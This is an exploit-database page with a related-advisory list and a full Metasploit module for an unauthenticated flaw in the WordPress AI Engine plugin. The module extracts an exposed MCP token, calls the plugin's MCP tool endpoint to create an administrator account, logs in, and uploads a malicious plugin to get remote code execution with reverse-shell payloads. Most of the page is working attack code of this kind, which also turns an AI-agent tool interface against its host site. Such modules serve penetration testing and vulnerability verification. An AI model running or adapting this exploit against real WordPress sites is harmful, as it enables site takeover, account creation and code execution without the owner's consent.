Lucene search
K

WordPress AI Engine Plugin MCP Unauthenticated Admin Creation to RCE

Exploits unauthenticated admin creation in WordPress AI Engine plugin to obtain remote execution.

Related
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for CVE-2025-11749
8 Nov 202503:19
githubexploit
Circl
CVE-2025-11749
4 Nov 202518:16
circl
CNNVD
WordPress plugin AI Engine 信息泄露漏洞
5 Nov 202500:00
cnnvd
CVE
CVE-2025-11749
5 Nov 202505:31
cve
Cvelist
CVE-2025-11749 AI Engine <= 3.1.3 - Unauthenticated Sensitive Information Exposure to Privilege Escalation
5 Nov 202505:31
cvelist
EUVD
EUVD-2025-37802
5 Nov 202505:31
euvd
Nuclei
WordPress AI Engine Plugin - Token Exposure
2 Jun 202610:14
nuclei
NVD
CVE-2025-11749
5 Nov 202506:15
nvd
Packet Storm
📄 WordPress AI Engine 3.1.3 Remote Code Execution
4 Dec 202500:00
packetstorm
Packet Storm
📄 WordPress AI Engine 3.1.3 Add Admin / Shell Upload
4 Mar 202600:00
packetstorm
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Payload::Php
  include Msf::Exploit::FileDropper
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HTTP::Wordpress

  prepend Msf::Exploit::Remote::AutoCheck

  ERROR_PATTERN = /already exists|username.*taken|user.*exists/i
  SUCCESS_PATTERN = /User (?:created|updated|#\d+ updated)|success|created/i

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'WordPress AI Engine Plugin MCP Unauthenticated Admin Creation to RCE',
        'Description' => %q{
          This module exploits an unauthenticated vulnerability in the WordPress AI Engine plugin
          (versions <= 3.1.3). The vulnerability allows an attacker to create an administrator account
          via the MCP (Model Context Protocol) endpoint without authentication. The module supports
          both `/wp-json/mcp/v1/` and `/?rest_route=/mcp/v1/` endpoints. Once an administrator
          account is created, the module uploads and executes a malicious plugin to achieve remote
          code execution (RCE).
        },
        'Author' => [
          'Emiliano Versini',                             # Vulnerability discovery
          'Khaled Alenazi (Nxploited)',                   # PoC
          'Valentin Lobstein <chocapikk[at]leakix.net>',  # Metasploit module
          'dledda-r7'                                     # Reviewer
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2025-11749'],
          ['URL', 'https://github.com/Nxploited/CVE-2025-11749']
        ],
        'DisclosureDate' => '2025-11-04',
        'DefaultTarget' => 0,
        'Privileged' => false,
        'Targets' => [
          [
            'PHP In-Memory',
            {
              'Platform' => 'php',
              'Arch' => ARCH_PHP
              # tested with php/meterpreter/reverse_tcp
            }
          ],
          [
            'Unix/Linux Command Shell',
            {
              'Platform' => %w[unix linux],
              'Arch' => ARCH_CMD
              # tested with cmd/linux/http/x64/meterpreter/reverse_tcp
            }
          ],
          [
            'Windows Command Shell',
            {
              'Platform' => 'win',
              'Arch' => ARCH_CMD
              # tested with cmd/windows/http/x64/meterpreter/reverse_tcp
            }
          ]
        ],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        }
      )
    )

    register_options(
      [
        OptString.new('USERNAME', [true, 'Username to create', Faker::Internet.username]),
        OptString.new('PASSWORD', [true, 'Password for the new user', Faker::Internet.password(min_length: 8)]),
        OptString.new('EMAIL', [true, 'Email for the new user', Faker::Internet.email])
      ]
    )
  end

  def check
    return CheckCode::Unknown('The target does not appear to be running WordPress') unless wordpress_and_online?

    plugin_check = check_plugin_version_from_readme('ai-engine', '3.1.4')
    return plugin_check if plugin_check == CheckCode::Safe

    @token = find_token
    return CheckCode::Safe('MCP token not found. Plugin may be patched or not configured.') unless @token

    CheckCode::Appears('The target appears to be a vulnerable version')
  end

  def exploit
    fail_with(Failure::NotFound, 'The target does not appear to be using WordPress') unless wordpress_and_online?

    @token ||= find_token
    fail_with(Failure::NotVulnerable, 'MCP token not found. Plugin may be patched or not configured.') unless @token

    username = datastore['USERNAME']
    password = datastore['PASSWORD']
    email = datastore['EMAIL']

    result = create_admin_user(@token, username, password, email)
    fail_with(Failure::UnexpectedReply, 'Failed to create administrator account.') if result == false

    if result == :user_exists
      print_warning('User already exists, updating password and continuing exploitation...')
      update_user_password(@token, username, password)
    end

    admin_cookie = wordpress_login(username, password)
    unless admin_cookie
      error_msg = 'Failed to log in to WordPress admin.'
      error_msg += ' User may exist with a different password.' if result == :user_exists
      fail_with(Failure::UnexpectedReply, error_msg)
    end

    upload_and_execute_payload(admin_cookie)
  end

  # REST API helpers
  def send_rest_request(rest_path, method: 'GET', data: nil)
    opts = {
      'method' => method,
      'ctype' => method == 'POST' ? 'application/json' : nil,
      'data' => data
    }

    uri = normalize_uri(target_uri.path, 'wp-json', rest_path)
    res = send_request_cgi(opts.merge('uri' => uri))
    return res if res&.code == 200

    vars_get = { 'rest_route' => rest_path }
    send_request_cgi(opts.merge('uri' => normalize_uri(target_uri.path), 'vars_get' => vars_get))
  end

  def find_token
    extract_token_from_routes(send_rest_request('/'))
  end

  def extract_token_from_routes(res)
    return nil unless res&.code == 200

    routes = res.get_json_document&.dig('routes')
    return nil unless routes.is_a?(Hash)

    mcp_regex = %r{^/mcp/v1/([^/]+)/sse$}
    routes.each_key do |route|
      next unless route.is_a?(String)

      match = route.match(mcp_regex)
      next unless match

      token = match[1]
      next if token == 'sse' || token.empty?

      return token
    end
    nil
  end

  # MCP API helpers
  def send_mcp_request(token, segments, method: 'GET', data: nil)
    path = "/mcp/v1/#{token}/#{segments.join('/')}"
    send_rest_request(path, method: method, data: data)
  end

  def build_mcp_payload(tool_name, arguments)
    {
      'jsonrpc' => '2.0',
      'id' => rand(1..999_999),
      'method' => 'tools/call',
      'params' => {
        'name' => tool_name,
        'arguments' => arguments
      }
    }.to_json
  end

  def send_mcp_tool_call_raw(token, tool_name, arguments)
    payload = build_mcp_payload(tool_name, arguments)
    res = send_mcp_request(token, ['sse'], method: 'POST', data: payload)
    return nil unless res
    return nil unless res.code == 200

    json_response = res.get_json_document
    return nil unless json_response.is_a?(Hash)

    json_response.dig('result', 'content')
  end

  def send_mcp_tool_call(token, tool_name, arguments)
    payload = build_mcp_payload(tool_name, arguments)
    res = send_mcp_request(token, ['sse'], method: 'POST', data: payload)
    return false unless res
    return true if res.code == 204
    return false unless res.code == 200

    json_response = res.get_json_document
    return false unless json_response.is_a?(Hash)

    error = json_response['error']
    return :user_exists if error.is_a?(Hash) && error['code'] == 'existing_user_login'
    return :user_exists if error.is_a?(Hash) && error['message']&.match?(ERROR_PATTERN)

    result_content = json_response.dig('result', 'content')
    return true if result_content&.any? { |item| item['text']&.match?(SUCCESS_PATTERN) }

    body = res.body.to_s
    return :user_exists if body =~ ERROR_PATTERN
    return true if body =~ SUCCESS_PATTERN

    false
  end

  # User management
  def get_user_id(token, username)
    arguments = {
      'search' => username,
      'search_columns' => ['user_login']
    }

    result_content = send_mcp_tool_call_raw(token, 'wp_get_users', arguments)
    return nil unless result_content.is_a?(Array)

    result_content.each do |item|
      next unless item.is_a?(Hash) && item['text']

      text = item['text'].to_s
      begin
        users = JSON.parse(text)
        users = [users] unless users.is_a?(Array)
        user = users.find { |u| u['user_login'] == username }
        return user['ID'].to_i if user && user['ID']
      rescue JSON::ParserError
        next
      end
    end

    nil
  end

  def create_admin_user(token, username, password, email)
    arguments = {
      'user_login' => username,
      'user_email' => email,
      'user_pass' => password,
      'role' => 'administrator'
    }
    send_mcp_tool_call(token, 'wp_create_user', arguments)
  end

  def update_user_password(token, username, password)
    user_id = get_user_id(token, username)
    return false unless user_id

    arguments = {
      'ID' => user_id,
      'fields' => {
        'user_pass' => password
      }
    }
    result = send_mcp_tool_call(token, 'wp_update_user', arguments)
    print_warning('Password update may have failed, attempting login anyway...') unless result
    result
  end

  # Payload execution
  def upload_and_execute_payload(admin_cookie)
    plugin_name = "wp_#{Rex::Text.rand_text_alphanumeric(5).downcase}"
    payload_name = "ajax_#{Rex::Text.rand_text_alphanumeric(5).downcase}"

    zip = generate_plugin(plugin_name, payload_name)
    fail_with(Failure::UnexpectedReply, 'Failed to upload the payload') unless wordpress_upload_plugin(plugin_name, zip.pack, admin_cookie)

    register_files_for_cleanup("#{payload_name}.php", "#{plugin_name}.php")
    register_dir_for_cleanup("../#{plugin_name}")
    payload_file = "#{payload_name}.php"
    payload_uri = normalize_uri(wordpress_url_plugins, plugin_name, payload_file)
    send_request_cgi('uri' => payload_uri, 'method' => 'GET')
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation